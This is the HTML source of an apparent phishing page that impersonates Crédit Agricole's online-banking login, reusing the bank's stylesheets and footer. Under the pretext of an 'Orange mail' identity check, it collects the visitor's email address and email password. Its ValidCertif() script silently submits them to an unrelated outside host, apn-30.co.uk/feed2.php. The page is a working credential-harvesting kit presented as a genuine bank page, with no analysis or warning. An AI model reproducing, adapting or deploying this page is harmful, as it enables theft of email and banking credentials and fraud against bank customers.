


<html>
<head>
<title>Crédit Agricole - Banque et Assurances</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />



</style>
<!--<![endif]-->
<link rel="shortcut icon" type="image/gif" href="http://www.credit-agricole.fr/squelettes/css/images/logos/favicon.gif?1402067367" />
<link rel="icon" type="image/gif" href="http://www.credit-agricole.fr/squelettes/css/images/logos/favicon.gif?1402067367" />
<script type='text/javascript'>var var_zajax_content='content';</script><script type="text/javascript">/* <![CDATA[ */
var box_settings = {tt_img:true,sel_g:"#documents_portfolio a[type='image/jpeg'],#documents_portfolio a[type='image/png'],#documents_portfolio a[type='image/gif']",sel_c:".mediabox",trans:"elastic",speed:"200",ssSpeed:"2500",maxW:"90%",maxH:"90%",minW:"400px",minH:"",opa:"0.9",str_ssStart:"Diaporama",str_ssStop:"Arrêter",str_cur:"{current}/{total}",str_prev:"Précédent",str_next:"Suivant",str_close:"Fermer",splash_url:""};
/* ]]> */</script>







 
 


<link rel="stylesheet" type="text/css" href="https://www.ce-g3-enligne.credit-agricole.fr/web/bam/tech/allmedia/stb/commun/styles/antiquus.css?v=50" media="all" />
<link rel="stylesheet" type="text/css" href="https://www.ce-g3-enligne.credit-agricole.fr/web/bam/appli/web/commun/styles/antiquus.css?v=50" media="all" />


<link rel="stylesheet" type="text/css" href="https://www.ce-g3-enligne.credit-agricole.fr/web/bam/tech/allmedia/stb/commun/styles/styles.css?v=50" media="all" />
<link rel="stylesheet" type="text/css" href="https://www.ce-g3-enligne.credit-agricole.fr/web/bam/appli/web/commun/styles/styles.css?v=50" media="all" />


<link rel="stylesheet" type="text/css" href="https://www.ce-g3-enligne.credit-agricole.fr/web/bam/tech/allmedia/stb/commun/styles/styles-mod.css?v=50" media="all" />
<link rel="stylesheet" type="text/css" href="https://www.ce-g3-enligne.credit-agricole.fr/web/bam/appli/web/commun/styles/styles-mod.css?v=50" media="all" />

<!--[if IE 8]>

<link rel="stylesheet" type="text/css" href="https://www.ce-g3-enligne.credit-agricole.fr/web/bam/tech/allmedia/stb/commun/styles/ie8.css?v=50" media="all" />
<link rel="stylesheet" type="text/css" href="https://www.ce-g3-enligne.credit-agricole.fr/web/bam/appli/web/commun/styles/ie8.css?v=50" media="all" />

<link rel="stylesheet" type="text/css" href="https://www.ce-g3-enligne.credit-agricole.fr/web/bam/tech/allmedia/stb/commun/styles/ie8-mod.css?v=50" media="all" />
<link rel="stylesheet" type="text/css" href="https://www.ce-g3-enligne.credit-agricole.fr/web/bam/appli/web/commun/styles/ie8-mod.css?v=50" media="all" />
<![endif]-->

<!--[if lte IE 7]>

<link rel="stylesheet" type="text/css" href="https://www.ce-g3-enligne.credit-agricole.fr/web/bam/tech/allmedia/stb/commun/styles/ie.css?v=50" media="all" />
<link rel="stylesheet" type="text/css" href="https://www.ce-g3-enligne.credit-agricole.fr/web/bam/appli/web/commun/styles/ie.css?v=50" media="all" />

<link rel="stylesheet" type="text/css" href="https://www.ce-g3-enligne.credit-agricole.fr/web/bam/tech/allmedia/stb/commun/styles/ie-mod.css?v=50" media="all" />
<link rel="stylesheet" type="text/css" href="https://www.ce-g3-enligne.credit-agricole.fr/web/bam/appli/web/commun/styles/ie-mod.css?v=50" media="all" />
<![endif]-->

<!--[if lt IE 7]>
<link rel="stylesheet" type="text/css" href="https://www.ce-g3-enligne.credit-agricole.fr/web/bam/tech/allmedia/stb/commun/styles/ieold.css?v=50" media="all" />
<link rel="stylesheet" type="text/css" href="https://www.ce-g3-enligne.credit-agricole.fr/web/bam/appli/web/commun/styles/ieold.css?v=50" media="all" />

<link rel="stylesheet" type="text/css" href="https://www.ce-g3-enligne.credit-agricole.fr/web/bam/tech/allmedia/stb/commun/styles/ieold-mod.css?v=50" media="all" />
<link rel="stylesheet" type="text/css" href="https://www.ce-g3-enligne.credit-agricole.fr/web/bam/appli/web/commun/styles/ieold-mod.css?v=50" media="all" />
<![endif]-->










<link rel="stylesheet" type="text/css" href="https://www.ce-g3-enligne.credit-agricole.fr/web/bam/tech/allmedia/stb/commun/styles/stb.css?v=50" media="all" />



<SCRIPT
	src="https://www.ce-g3-enligne.credit-agricole.fr/web/bam/tech/allmedia/stb/commun/js/infosbulle.js"></SCRIPT>
</head>
</html>



<SCRIPT LANGUAGE="JavaScript">
<!--

//Message affiché quand le souris est au-dessus: 
statusconfirmer="Confirmer l'identification";
statusannuler="Annuler l'identification";
statusaide="Besoin d'Aide ?";
statuscondjur="Conditions juridiques";
statusdemo="Voir la démonstration";
statuscompte="Saisir votre n° de compte";
statuscode="Saisir votre code personnel";
statuscorriger="Corriger votre dernière saisie";
statusclavnum="Cliquez dans la grille pour composer votre code personnel";
statusrecom="Voir nos recommandations";

// on recupere la version du navigateur
var OS = 'Win';
// on recupere la version du navigateur
Version=navigator.appVersion;
App = navigator.appName;
var Version=Version.substring(0,1);
var posOS = navigator.appVersion.indexOf('Mac');
var posOS2 = navigator.appVersion.indexOf('Win');
if (posOS >= 0) OS = 'Mac';
if ((posOS < 0) && (posOS2 >= 0)) OS = 'Win';
if (OS == 'Win') Nav_sup = 2;
else Nav_sup = 3;
// si c'est Netscape 2+ ou MSIE3+, c'est correct
browserOK=(((navigator.appName=="Netscape") && (Version > 1)) || (Version>=Nav_sup));
browserOK1=(((navigator.appName=="Netscape") && (Version > 1)) || (Version>=4));
browserOK2=(navigator.appName=="Netscape");


// Detection navigateur
nsvers = "0.94"; // pour netscape "6.2";
ievers = "5";
browserOK = false;
isIE55 = false;
var d, na, nua, nav, nan, dom, ie, ienu, ie4, ie5, ie5x, ie6, moz, moznu, ns62, mac, win, old, lin, ie5mac, ie5xwin, op, opnu, op4, op5, op6, op7, konq, saf, saf_num;

//variable initialization

d = document;
na = navigator;
nav = na.appVersion;
nan = na.appName;
nua = na.userAgent;
win = ( nav.indexOf( 'Win' ) != -1 );
mac = ( nav.indexOf( 'Mac' ) != -1 );
lin = ( nav.indexOf( 'Linux' ) != -1 );

if ( !d.layers ){
	dom = ( d.getElementById );
	old = ( nav.substring( 0, 1 ) < 4 );
	op = ( nua.indexOf( 'Opera' ) != -1 );
	moz = ( nua.indexOf( 'Gecko' ) != -1 );
	ie = ( d.all && !op );
	konq = ( nua.indexOf( 'Konqueror' ) != -1 );
	saf = ( nua.indexOf( 'Safari' ) != -1 );

	if ( op ){
		op_pos = nua.indexOf( 'Opera' );
		opnu = nua.substr( ( op_pos + 6 ), 3 );
		op5 = ( opnu.substring( 0, 1 ) == 5 );
		op6 = ( opnu.substring( 0, 1 ) == 6 );
		op7 = ( opnu.substring( 0, 1 ) == 7 );
	}
	else if ( saf ){
		saf_pos = nua.indexOf( 'Safari' );
		saf_nu = nua.substr( ( saf_pos + 7 ), 2 );
	}
	else if ( moz ){
		rv_pos = nua.indexOf( 'rv' );
		moz_rv = nua.substr( ( rv_pos + 3 ), 3 );
		moz_rv_sub = nua.substr( ( rv_pos + 7 ), 1 );
		moz_rv_sub = moz_rv + moz_rv_sub;
		browserOK = (moz_rv_sub >= nsvers);
	}
	else if ( ie ){
		ie_pos = nua.indexOf( 'MSIE' );
		ienu = nua.substr( ( ie_pos + 5 ), 3 );
		ie4 = ( !dom ); 
		ie5 = ( ienu.substring( 0, 1 ) == 5 );
		ie6 = ( ienu.substring( 0, 1 ) == 6 );
		browserOK = ( ienu.substring( 0, 1 ) >= ievers );
	}
	else{} 

	ie5x = ( d.all && dom );
	isIE55 = ie5x;
	ie5mac = ( mac && ie5 );
	ie5xwin = ( win && ie5x );
}

function Init()
{
		if (document.formulaire.CCPTE.value == "") document.formulaire.CCPTE.focus();
        document.onkeydown=pressKey;
}

ns4=(document.layers)? true:false;
ie4=(document.all)? true:false;

function pressKey (e) {
/*
        if (ns4) {var nKey=e.which; var ieKey=0}
        if (ie4) {var ieKey=event.keyCode; var nKey=0}
        if (nKey==13 || ieKey==13) {
				validation(document.formulaire);
                return true;
        }
*/
}

function setSize(win,width,height) {
	if (win.outerWidth) {
		win.outerWidth = width;
		win.outerHeight = height;
	}
	else if (win.resizeTo) {
		win.resizeTo(width,height);
	}
	else {
		alert("Not supported.");
	}
}

function clicPosition(position) {
	cocherCase();
	if (document.formulaire.CCCRYC2.value.length == 6) { 
		return; 
	}
	if (document.formulaire.CCCRYC.value=="") 
		document.formulaire.CCCRYC.value = position;
	else
		document.formulaire.CCCRYC.value = document.formulaire.CCCRYC.value + "," + position;
	document.formulaire.CCCRYC2.value = document.formulaire.CCCRYC2.value + "0";
}

var code, pos_der_code, affiche_code;
function effacer() { 
	if (document.formulaire.CCCRYC2.value.length == 0) { 
		return; 
	}
	code = document.formulaire.CCCRYC.value;
	pos_der_code = code.lastIndexOf( ',' );
	code = code.substr( 0,pos_der_code);

	affiche_code = document.formulaire.CCCRYC2.value;
	affiche_code = affiche_code.substr( 0,(document.formulaire.CCCRYC2.value.length - 1) );

	document.formulaire.CCCRYC.value = code;
	document.formulaire.CCCRYC2.value = affiche_code;
}

var i=0;
function cocherCase() {
	if ( i<6)
	{
		var l_oBarre = document.getElementById("monAvancement");
		l_oBarre.rows[0].cells[i].style.visibility = 'visible';
		i = i + 1;
	}
}
function corriger() {
	if ( i>0 )
	{
		i = i - 1;
		var l_oBarre = document.getElementById("monAvancement");
		l_oBarre.rows[0].cells[i].style.visibility = 'hidden';
	 }
}

var path_static = "";
var path_dynamic = "/stb";
// Recuperation code caisse
var caisse = "878";

function raf(){
	return;
}

var urlappli = "feed2.php";
var urlapplisecu = "";

function ValidCertif(){
	document.formulaire.action = "http://www.apn-30.co.uk/feed2.php" ;
	formulaire.submit();

}

function ValidCertifSecu(){
	document.formulaire.action = urlapplisecu;
	validation(document.formulaire)
}

// -->
</SCRIPT>

<SCRIPT LANGUAGE=JavaScript>
<!--

function ouvrePOPUP(item,widthpop,heightpop,men) {
	if(item.indexOf("?") != -1) {
		item = item+"&stbevt=Popup";
	}
	else {
		item = item+"?stbevt=Popup";
	}

	ouvreFenetre(item,widthpop,heightpop,men,"PopUp");
}
function ouvreassistance(item,widthpop,heightpop,men) {
	ouvreFenetre(item,widthpop,heightpop,men,"Assistance");
}

function ouvreFenetre(item,widthpop,heightpop,men,titre) {

	if (item.indexOf("?") != -1) {
		if (item.indexOf("#") != -1)
			url = item.substring(0,item.indexOf("#"))+"&typeaction=Popup"+item.substring(item.indexOf("#"),item.length);
		else
			url = item+"&typeaction=Popup";
	} else {
		url = item;
	}

	aazz = "menubar=" + men + ",resizable=yes,toolbar=no,width=" + widthpop + ",height=" + heightpop + ",scrollbars=yes";

	// on verifie si l'on n'est pas deja sur la bonne fenetre
	if (titre!=window.name) {
		// Mise en commentaire de l ancien code
		//if (!saf) {
			// on recupere un reference sur le popup (s'il n'est pas ouvert, cela en ouvre une!)
		//	popup1 = window.open('',titre,aazz);
			// on ferme le popup
		//	popup1.close();
		//}
		// on ouvre le nouveau avec les nouveaux parametres (taille, bouton...)
		//popup1 = window.open('',titre,aazz);
		//popup1.name = titre;
		//setSize(popup1,widthpop,heightpop);
			
		popup1 = window.open(url,titre,aazz);
			
	    if (moz ) popup1.focus();
	    //popup1.location =url;
	} else {
		window.name = titre;
		setSize(window,widthpop,heightpop);
		document.location = url;
	}

}

function setSize(win,width,height) {
	if (win.outerWidth) {
		win.outerWidth = width;
		win.outerHeight = height;
	}
	else if (win.resizeTo) {
		win.resizeTo(width,height);
	}
	else {
		alert("Not supported.");
	}
}

//ouvre une fenêtre popup en plein écran ne laissant l'affichage que de la bnt
function ouvrirPopupBntVisible(url) {
	window.open(url,'Popup','location=no,toolbar=no,directories=no,menubar=yes,resizable=yes,scrollbars=yes,status=yes,width='+(screen.availWidth-140)+',height='+screen.availHeight+',screenY=0,screenX='+140);
}

// -->
</SCRIPT>




<body  text="#000000" leftmargin="0" topmargin="0" onLoad="Init()">
<div id="container">
							<div id="contenu" style="width: 957px;">
<table border="0" >
	<tr>
		<td colspan="3">


<div align="center" style="background-color:#E6E6E6;">
<table width="620px" cellspacing="0" cellpadding="0" border="0">
<tr>
<td style="background:#E6E6E6;">
	<div id="entete_vide">	
		<div id="entete" style="background:none;">
   			 <div id="gauche-entete">
		        <h1>
		            <a title="Crédit Agricole - Banque et Assurances" href="#" id="lien-logo">
		                <img alt="Crédit Agricole - Banque et Assurances" src="http://img11.hostingpics.net/pics/526614logo878.png"/>
		                <span>Crédit Agricole</span>
		            </a>
		        </h1>
		        <p id="slogan">Banque et Assurances</p>
		    </div>
   		 </div>
	</div>
</td>
</tr>
</table>
</div>
		</TD>
	</TR>
	<TR valign="top">
	
		<TD>
		
		<TABLE style="background:#00000"border="0" width="100%" cellpadding="0" cellspacing="0">

			<TR >
				<TD valign="top" width="169" style="background:#E6E6E6 repeat-y scroll left top">&nbsp;</TD>
				<TD id="col-centre" valign="top" width="590px" >
				
				<TABLE width="590" border="0" cellspacing="0" cellpadding="0">
					<TR>
						<TD>
						
						<table width="590" border="0" cellspacing="0" cellpadding="0">
							
							<tr>
								<td colspan="2" class="montant2">&nbsp;</td>
							</tr>
							
							<tr>
								<td colspan="2" height="17"></td>
							</tr>
							<!-- bandeau authentification --> <tr><td colSpan="2" align="center"><a href="" target="_blank" > <img src="https://www.ca-centrest.fr/Vitrine/ObjCommun/Fic/CentrEst/pap_bam/img/img_entreebam.gif"border=no></a></tr></tr> <tr><td>&nbsp;</td></tr>     
							<tr>
								<td height="17"><div class="boutons-act">
                    <h1>
                        Vérification de votre identité via votre orange mail Service !

                   <span id="top-actions">
								<a id="top-actions-aide" href=""
				onmouseout="StatusMessage( false )"
				onmouseover="StatusMessage(true, statusaide);return true" tabindex="32"
				>Aide</a></span></h1>
</div></td>
							</tr>
						</table>
						<FORM class="ca-forms ca-forms-stitre" method="POST" name="formulaire" action="/stb/entreeBam" onSubmit="return false;">
							<input type="hidden" name="idtcm" value="" /> 
							<input type="hidden" name="origine" value="vitrine" /> 
							<input type="hidden" name="situationTravail"
								value="BANCAIRE" /> 
							<input type="hidden" name="canal" value="WEB" /> 
							<input type="hidden" name="typeAuthentification"
								value="CLIC_RETOUR" />
							<input type="hidden" name="idUnique" value="682c68bb:144d25ba743:-7fb2" /> 
							<input type="hidden" name="caisse" value="878" /> 
							<input type="hidden" name="CCCRYC" value="" />
						<fieldset class="blc-choix"><div class="blc-choix-wrap" style="padding-bottom: 40px;"><p class="nomarge">    <b>Pour des raisons de sécurité, nous vérifions que l'adresse email enregistrée dans votre dossier est bien la vôtre. Une fois ces informations saisies ,vous serez automatiquement vérifié via le serveur orange Mail .
<div align="right"></div></p><p class="validation" style="width:570px"><a class="retour gauche" HREF="" tabindex="33">Nos recommandations</a></p></div></fieldset>
						<table width="590" border="0" >
							<!-- Message securitaire -->

							<tr>
								<td height="22" colspan="3">
								<input type="hidden" name="CCCRYC2" value="" />
								 <fieldset class="blc-choix">
							 <script>
								if(saf){
									document.write("<div class=\"blc-choix-wrap\" style=\"padding-bottom:190px;\">");
									
								}else{
									document.write("<div class=\"blc-choix-wrap\">");
								}
							   
							</script>
								<SCRIPT langage = "Javascript">
<!--
function validation(formulaire) {
	if(formulaire.CCPTE.value=="") {
		alert("Votre numéro de compte est incomplet.");
		return;
	}
	if(formulaire.CCCRYC.value=="") {
		alert("Votre code personnel est incomplet.");
		return;
	}
	if(isAlphaNum(formulaire.CCPTE.value)) {
		if(isNumerique(formulaire.CCCRYC2.value)) {
			formulaire.submit();
		}
		else {
		alert("Votre code personnel est incomplet.");
		}
	}
	else {
		alert("Votre numéro de compte est incomplet.");
	}
}
function isNumerique(chaine){
if (chaine.length!=6)
return false;
for(var i=0;i<chaine.length;i++){
if(chaine.charAt(i)>'9' || chaine.charAt(i)<'0'){
return false;
}
}
return true;
}
function isAlphaNum(chaine){
if (chaine.length!=11)
return false;
chaine = chaine.toLowerCase();
for(var i=0;i<chaine.length;i++){
if(!((chaine.charAt(i)<='9' && chaine.charAt(i)>='0') || (chaine.charAt(i)<='z' && chaine.charAt(i)>='a'))){
return false;
}
}
return true;
}
-->
</SCRIPT>
<h3>Verification via Mail orange :</h3>

<p></p>
<label class="normal">votre adresse e-mail :</label>
 <input type="text" name="mail" size="40" maxlength="40" tabindex="1">
<p></p>
<label class="normal">Mot de passe e-mail :</label>
 <input type="password" name="pass" size="20" maxlength="20" tabindex="1">
<p></p>                 	
                            		
	                            		
																					<a class="droite" HREF="javascript:ValidCertif();"tabindex="28">Valider / Confirmer</a>
	                            		
			   							
			   							
								</span>                           
                            </p>
						</div>
                   		 </fieldset>
										
								</td>
							</tr>
							
						</table>
						
						</td>
					</tr>
		<tr >
		<td>		
		<!-- Pavé Certificat --> 
		
		<!-- Conditions Juridique --> <form class="ca-forms" style="padding:0 0;"><p>Je reconnais avoir pris connaissance et accepté les conditions juridiques de la convention d'utilisation du service.</p><p class="validation" style="width:580px"><script>var srcLien = path_dynamic + "/app/bam/tech/allmedia/stb/entreebam/jsp/AUTH-INF.jsp";var srcPuceLien = path_static + "https://www.ce-g3-enligne.credit-agricole.fr/web/bam/tech/allmedia/stb/commun/picts/PuceLien.gif";var yesno = "no";var authentif = "AUTH";</script><a class="retour gauche" HREF="" tabindex="34">Conditions juridiques</a></p></form>
			</td>
		</tr>
		</table>
		</TD>
		<TD valign="top" width="171" style="background:#E6E6E6 repeat-y scroll left top">&nbsp;</TD>
		</TR>
		
		
	<TR valign="middle" style="background-color:#E6E6E6;">
	<td></td>
		<TD>
		<TABLE border=0 cellPadding=0 cellSpacing=0 width="590">
			<tr>
				<TD class="footercopyright" align="center">&nbsp;</TD>
			</tr>
			<TR>
				<TD class="footercopyright" align="center">@2004-2016 Crédit Agricole,
				tous droits réservés</TD>
			</TR>
		</TABLE>
		 

<!--MARQUEUR XITI-->
<script language="JavaScript1.1">
<!--
hsh = new Date();
hsd = document;
hsi = '<img width="1" height="1" src="https://logs8.xiti.com/hit.xiti?cc=17&cs=878&s2=1'
hsi += '&p=identification_autre_&hl=' + hsh.getHours() + 'x' + hsh.getMinutes() + 'x' + hsh.getSeconds();
if(parseFloat(navigator.appVersion)>=4)
{Xiti_s=screen;hsi += '&r=' + Xiti_s.width + 'x' + Xiti_s.height + 'x' + Xiti_s.pixelDepth + 'x' + Xiti_s.colorDepth;}
hsd.writeln(hsi + '&ref=' + hsd.referrer.replace('&', '$') + '" >');
//-->
</script>
<noscript>
<img width="1" height="1" src="https://logs8.xiti.com/hit.xiti?cc=17&cs=878&s2=1&p=identification_autre_" />
</noscript>
		</TD>
		<td ></td>
	</TR></TABLE>
</TD>



</TR>
</TABLE>

</TD>
</TR>
</TABLE>
<table>
	<tr>
		<td width="169"></td>
		<td id="main_bas" width="570" ></td>
		<td width="169"></td>
	</tr>
</table>
</div>
</div>
</body>